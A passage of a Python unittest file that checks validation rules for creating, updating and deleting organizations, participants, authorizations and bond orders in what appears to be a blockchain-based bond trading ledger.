'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank2",
"ticker": "T",
"pricing_source": "ABCf",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Ticker already exists")
except InvalidTransactionError:
pass
def test_organization_is_valid_pricing_source(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank1",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
# add organization with the same name
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank2",
"ticker": "F",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Pricing Source already exists")
except InvalidTransactionError:
pass
def test_organization_is_valid_short_pricing_source(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "A",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Pricing Source is too short")
except InvalidTransactionError:
pass
def test_organization_is_valid_bad_authorization_format(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [{"ParticipantId": "object_id"}]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Needs ParticipantId and Roles")
except InvalidTransactionError:
pass
def test_organization_is_valid_authorization_participant_roles(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [{"ParticipantId": "object_id",
"Role": "moneymaker"}]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Role can only be trader or marketmaker")
except InvalidTransactionError:
pass
def test_organization_is_valid_authorization_participant_id(self):
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [{"ParticipantId": "made_up_id",
"Role": "marketmaker"}]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Participant does not exist")
except InvalidTransactionError:
pass
def test_organization_is_valid_authorization_ref_count(self):
p = self.store.keys()[0]
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [{"ParticipantId": p,
"Role": "marketmaker"}]
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
org = self.store.lookup("organization:name", "Test Bank")
self.assertEquals(org["ref-count"], 1)
class TestUpdateOrganizationUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
participant = CreateParticipantUpdate("CreateParticipant", "testuser")
object_id = participant._object_id
transaction = BondTransaction({})
transaction._updates = [participant]
self.store = ObjectStore()
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [],
"industry": "Test"
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
def test_organization_update_valid(self):
org = self.store.lookup("organization:name", "Test Bank")
org_id = org["object-id"]
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"name": "Best Bank",
"object_id": org["object-id"]
}]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
org = self.store.lookup("organization:name", "Best Bank")
self.assertEquals(org_id, org["object-id"])
def test_organization_update_creator_id(self):
key = signed_object.generate_signing_key()
org = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"name": "Best Bank",
"object_id": org["object-id"]
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Wrong creator")
except InvalidTransactionError:
pass
def test_organization_update_ticker(self):
org = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"ticker": "T",
"object_id": org["object-id"]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Organization already has a ticker")
except InvalidTransactionError:
pass
def test_organization_update_pricing_source(self):
org = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"pricing_source": "EFGH",
"object_id": org["object-id"]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Organization already has a pricing source")
except InvalidTransactionError:
pass
def test_organization_update_name(self):
org = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"name": "Test Bank",
"object_id": org["object-id"]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Organization already has a pricing source")
except InvalidTransactionError:
pass
def test_organization_update_industry(self):
org = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "UpdateOrganization",
'Updates': [{"UpdateType": "UpdateOrganization",
"object_id": org["object-id"],
"industry": "The Best Industry",
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
org = self.store.lookup("organization:name", "Test Bank")
self.assertEquals(org["industry"], "The Best Industry")
class TestUpdateOrganizationAuthorizationUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
participant = CreateParticipantUpdate("CreateParticipant", "testuser")
object_id = participant._object_id
transaction = BondTransaction({})
transaction._updates = [participant]
self.store = ObjectStore()
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [],
"industry": "Test"
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
def test_organization_add_authorization_valid(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid")
def test_organization_add_authorization_role(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "moneymaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Bad Role")
except InvalidTransactionError:
pass
def test_organization_add_authorization_object_id(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": "BadId",
"action": "add",
"participant_id": participant["object-id"],
"role": "moneymaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Object Id doesnt exist")
except InvalidTransactionError:
pass
def test_organization_add_authorization_valid_exists(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Participant already in Authorization list")
except InvalidTransactionError:
pass
def test_organization_add_remove_self_authorization_valid(self):
key = signed_object.generate_signing_key()
firm = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "NewUser",
"firm_id": firm["object-id"]
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "NewUser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid, Added by self")
def test_organization_add_self_authorization_valid(self):
key = signed_object.generate_signing_key()
firm = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "NewUser",
"firm_id": firm["object-id"]
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "NewUser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid, Added by Creator")
def test_organization_add_remove_self_authorization(self):
key = signed_object.generate_signing_key()
firm = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "NewUser",
"firm_id": firm["object-id"]
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "NewUser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid, Added by Creator")
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "NewUser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "remove",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(key)
transaction.check_valid(self.store)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
def test_organization_add_remove_others_authorization(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "remove",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
class TestDeleteOrganizationUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
participant = CreateParticipantUpdate("CreateParticipant", "testuser")
object_id = participant._object_id
transaction = BondTransaction({})
transaction._updates = [participant]
self.store = ObjectStore()
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [],
"industry": "Test"
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
def test_organization_delete_valid(self):
organization = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "DeleteOrganization",
'Updates': [{"UpdateType": "DeleteOrganization",
"object_id": organization["object-id"]
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
def test_organization_delete_creator_id(self):
key = signed_object.generate_signing_key()
organization = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "DeleteOrganization",
'Updates': [{"UpdateType": "DeleteOrganization",
"object_id": organization["object-id"]
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Can only be deleted by Creator")
except InvalidTransactionError:
pass
def test_organization_delete_refcount(self):
organization = self.store.lookup("organization:name", "Test Bank")
participant = self.store.lookup("participant:username", "testuser")
transaction = BondTransaction({
"UpdateType": "UpdateOrganizationAuthorization",
'Updates': [{"UpdateType": "UpdateOrganizationAuthorization",
"object_id": organization["object-id"],
"action": "add",
"participant_id": participant["object-id"],
"role": "marketmaker"
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should valid")
organization = self.store.lookup("organization:name", "Test Bank")
transaction = BondTransaction({
"UpdateType": "DeleteOrganization",
'Updates': [{"UpdateType": "DeleteOrganization",
"object_id": organization["object-id"]
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Refcount must be zero")
except:
pass
class TestCreateParticipantUpdate(unittest.TestCase):
def setUp(self):
self.store = ObjectStore()
key = signed_object.generate_signing_key()
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "FirstUser",
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "FirstBank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
def test_participant_is_valid_valid(self):
key = signed_object.generate_signing_key()
firm = self.store.lookup("organization:name", "FirstBank")
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "testusers",
"firm_id": firm["object-id"]
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
def test_participant_is_valid_object_id(self):
key = signed_object.generate_signing_key()
object_id = self.store.keys()[0]
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "testusers",
"object_id": object_id
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Object_id already exists")
except InvalidTransactionError:
pass
def test_participant_is_valid_username(self):
key = signed_object.generate_signing_key()
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "FirstUser",
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Username already exists")
except InvalidTransactionError:
pass
def test_participant_is_valid_username_length(self):
key = signed_object.generate_signing_key()
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "F",
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Username is too short")
except InvalidTransactionError:
pass
def test_participant_is_valid_firm(self):
key = signed_object.generate_signing_key()
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "F",
"firm_id": "badFirmId"
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Username is too short")
except InvalidTransactionError:
pass
def test_correct_refcount_when_adding_participant(self):
key = signed_object.generate_signing_key()
firm = self.store.lookup("organization:name", "FirstBank")
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "testusers",
"firm_id": firm["object-id"]
}]
})
try:
transaction.sign_object(key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
firm = self.store.lookup("organization:name", "FirstBank")
self.assertEquals(firm["ref-count"], 1)
class TestUpdateParticipantUpdate(unittest.TestCase):
def setUp(self):
self.store = ObjectStore()
self.key = signed_object.generate_signing_key()
transaction = BondTransaction({
"UpdateType": "CreateParticipant",
'Updates': [{"UpdateType": "CreateParticipant",
"username": "FirstUser",
}]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
pass
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "FirstBank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
pass
def test_particpant_update_valid(self):
participant = self.store.lookup("participant:username", 'FirstUser')
part_id = participant["object-id"]
firm = self.store.lookup("organization:name", 'FirstBank')
transaction = BondTransaction({
"UpdateType": "UpdateParticipant",
'Updates': [{"UpdateType": "UpdateParticipant",
"username": "SameUser",
"firm_id": firm["object-id"],
"object_id": part_id
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
pass
participant = self.store.lookup("participant:object-id", part_id)
self.assertEquals(participant["username"], "SameUser")
self.assertEquals(participant["firm-id"], firm["object-id"])
def test_participant_update_creator_id(self):
key = signed_object.generate_signing_key()
participant = self.store.lookup("participant:username", 'FirstUser')
part_id = participant["object-id"]
firm = self.store.lookup("organization:name", 'FirstBank')
transaction = BondTransaction({
"UpdateType": "UpdateParticipant",
'Updates': [{"UpdateType": "UpdateParticipant",
"username": "SameUser",
"firm_id": firm["object-id"],
"object_id": part_id
}]
})
transaction.sign_object(key)
try:
transaction.check_valid(self.store)
self.fail("Wrong Creator")
except InvalidTransactionError:
pass
def test_participant_update_username(self):
key = signed_object.generate_signing_key()
participant = self.store.lookup("participant:username", 'FirstUser')
part_id = participant["object-id"]
firm = self.store.lookup("organization:name", 'FirstBank')
transaction = BondTransaction({
"UpdateType": "UpdateParticipant",
'Updates': [{"UpdateType": "UpdateParticipant",
"username": "FirstUser",
"firm_id": firm["object-id"],
"object_id": part_id
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Name already exists")
except InvalidTransactionError:
pass
def test_participant_update_firm_id(self):
participant = self.store.lookup("participant:username", 'FirstUser')
part_id = participant["object-id"]
firm = self.store.lookup("organization:name", 'FirstBank')
transaction = BondTransaction({
"UpdateType": "UpdateParticipant",
'Updates': [{"UpdateType": "UpdateParticipant",
"username": "SameUser",
"firm_id": "BadId",
"object_id": part_id
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Firm ID does not exist")
except InvalidTransactionError:
pass
class TestCreateOrderUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
self.store = ObjectStore()
transaction = BondTransaction({})
participant = CreateParticipantUpdate('CreateParticipant', 'TestName')
transaction._updates = [participant]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
organization = CreateOrganizationUpdate('CreateOrganization',
'TestOrg', ticker='T',
pricing_source='TEST',
authorization=[])
self.firm_id = organization._object_id
transaction._updates = [organization]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
'Updates': [{
'UpdateType': 'Clock',
'Blocknum': 0,
'PreviousBlockId': 0,
'Timestamp': time.time()
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
bond = CreateBondUpdate('CreateBond', issuer='T',
amount_outstanding=42671000000,
isin='US912828R770',
cusip='912828R77', corporate_debt_ratings=[],
coupon_benchmark=None, coupon_rate=.15,
coupon_type='Fixed',
coupon_frequency='Quarterly',
first_coupon_date='03/01/2012',
maturity_date='10/20/2015',
face_value=10000)
transaction._updates = [bond]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
org_obj = self.store.lookup('organization:ticker', 'T')
self.org_ref_count = org_obj['ref-count']
def test_valid_order(self):
transaction = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [{'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'Isin': 'US912828R770', 'FirmId': self.firm_id}]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This is a correct CreateOrder")
def test_missing_required_attributes(self):
update = {'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'Isin': 'US912828R770', 'FirmId': self.firm_id}
for attr in ['Action', 'OrderType', 'Isin', 'FirmId']:
update[attr] = None
transaction = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [update]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
self.fail("Missing required attribute: {}".format(attr))
except InvalidTransactionError:
pass
def test_order_limit(self):
transaction = BondTransaction(
{'UpdateType': 'CreateOrder',
'Updates': [{'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Limit',
'Isin': 'US912828R770',
'FirmId': self.firm_id}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
self.fail("Limit order requires LimitPrice or LimitYield")
except InvalidTransactionError:
pass
def test_order_market(self):
update = {'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'Isin': 'US912828R770', 'FirmId': self.firm_id}
for attr, num in {'LimitPrice': '98-13+',
'LimitYield': .15}.iteritems():
update[attr] = num
transaction = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [update]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
self.fail("{} was set with a Market order".format(attr))
except InvalidTransactionError:
pass
def test_no_isin_or_cusip(self):
transaction = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [{'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'FirmId': self.firm_id}]
})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
self.fail("Isin and Cusip not set")
except InvalidTransactionError:
pass
def test_isin_and_cusip_not_valid(self):
update = {'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'Isin': 'NotValid', 'FirmId': self.firm_id}
transaction1 = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [update]
})
try:
transaction1.sign_object(self.key)
transaction1.check_valid(self.store)
self.fail("Not a correct isin")
except InvalidTransactionError:
pass
update['Cusip'] = 'NotValid'
transaction2 = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [update]
})
try:
transaction2.sign_object(self.key)
transaction2.check_valid(self.store)
self.fail("Neither isin nor cusip were valid")
except InvalidTransactionError:
pass
del update['Isin']
transaction3 = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [update]
})
try:
transaction3.sign_object(self.key)
transaction3.check_valid(self.store)
self.fail("Not a correct cusip")
except InvalidTransactionError:
pass
transaction = BondTransaction({})
bond = CreateBondUpdate('CreateBond', issuer='T',
amount_outstanding=42671000000, isin=None,
cusip='12345', corporate_debt_ratings=[],
coupon_benchmark=None, coupon_rate=.15,
coupon_type='Fixed',
coupon_frequency='Quarterly',
first_coupon_date='03/01/2012',
maturity_date='10/20/2015',
face_value=10000)
transaction._update = [bond]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction4 = BondTransaction({
'UpdateType': 'CreateOrder',
'Updates': [{'UpdateType': 'CreateOrder', 'Action': 'Buy',
'Quantity': 1000000, 'OrderType': 'Market',
'Isin': 'US912828R770',
'Cusip': '12345', 'FirmId': self.firm_id}]
})
try:
transaction4.sign_object(self.key)
transaction4.check_valid(self.store)
self.fail("Cusip and Isin reference different bonds")
except InvalidTransactionError:
pass
def test_ref_count(self):
self.test_valid_order()
org_obj = self.store.lookup('organization:ticker', 'T')
self.assertEquals(org_obj['ref-count'], self.org_ref_count + 1)
class TestUpdateOrderUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
self.store = ObjectStore()
transaction = BondTransaction({})
participant = CreateParticipantUpdate('CreateParticipant', 'TestName')
transaction._updates = [participant]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
auth = {'ParticipantId': participant._object_id,
'Role': 'marketmaker'}
organization = CreateOrganizationUpdate('CreateOrganization',
'TestOrg', ticker='T',
pricing_source='TEST',
authorization=[auth])
self.firm_id = organization._object_id
transaction._updates = [organization]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
'Updates': [{
'UpdateType': 'Clock',
'Blocknum': 0,
'PreviousBlockId': 0,
'Timestamp': time.time()
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
bond = CreateBondUpdate('CreateBond', issuer='T',
amount_outstanding=42671000000,
isin='US912828R770',
cusip='912828R77', corporate_debt_ratings=[],
coupon_benchmark=None, coupon_rate=.15,
coupon_type='Fixed',
coupon_frequency='Quarterly',
first_coupon_date='03/01/2012',
maturity_date='10/20/2015',
face_value=10000)
transaction._updates = [bond]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
order = CreateOrderUpdate('CreateOrder', action='Buy',
quantity=1000000, order_type='Market',
isin='US912828R770',
firm_id=organization._object_id)
quote = CreateQuoteUpdate('CreateQuote', ask_price='95-15+',
ask_qty=1000000, bid_price='85-78',
bid_qty=1000000, firm='TEST',
isin='US912828R770')
transaction._updates = [order, quote]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.order_id = order._object_id
self.quote_id = quote._object_id
def test_valid_orderupdate(self):
self.assertEqual(self.store[self.order_id]["status"], "Open")
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [{'UpdateType': 'UpdateOrder',
'ObjectId': self.order_id,
'QuoteId': self.quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
order_obj = self.store.get(self.order_id, 'order')
self.assertEqual(order_obj['quote-id'], self.quote_id,
"QuoteId has been set")
quote_obj = self.store.get(self.quote_id, 'quote')
self.assertEqual(quote_obj['ref-count'], 1,
"Quote has ref-count updated")
self.assertEqual(self.store[self.order_id]["status"], "Matched")
except InvalidTransactionError:
self.fail("Correct UpdateOrder transaction")
def test_wrong_object_id(self):
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': 'NotValid',
'QuoteId': self.quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("Wrong Object Id will fail")
except InvalidTransactionError:
pass
def test_object_id_not_an_order(self):
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': self.quote_id,
'QuoteId': self.quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("Object Id is not an Order")
except InvalidTransactionError:
pass
def test_wrong_order_id(self):
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': self.order_id,
'QuoteId': 'NotValid',
'Status': 'Matched'}]})
try:
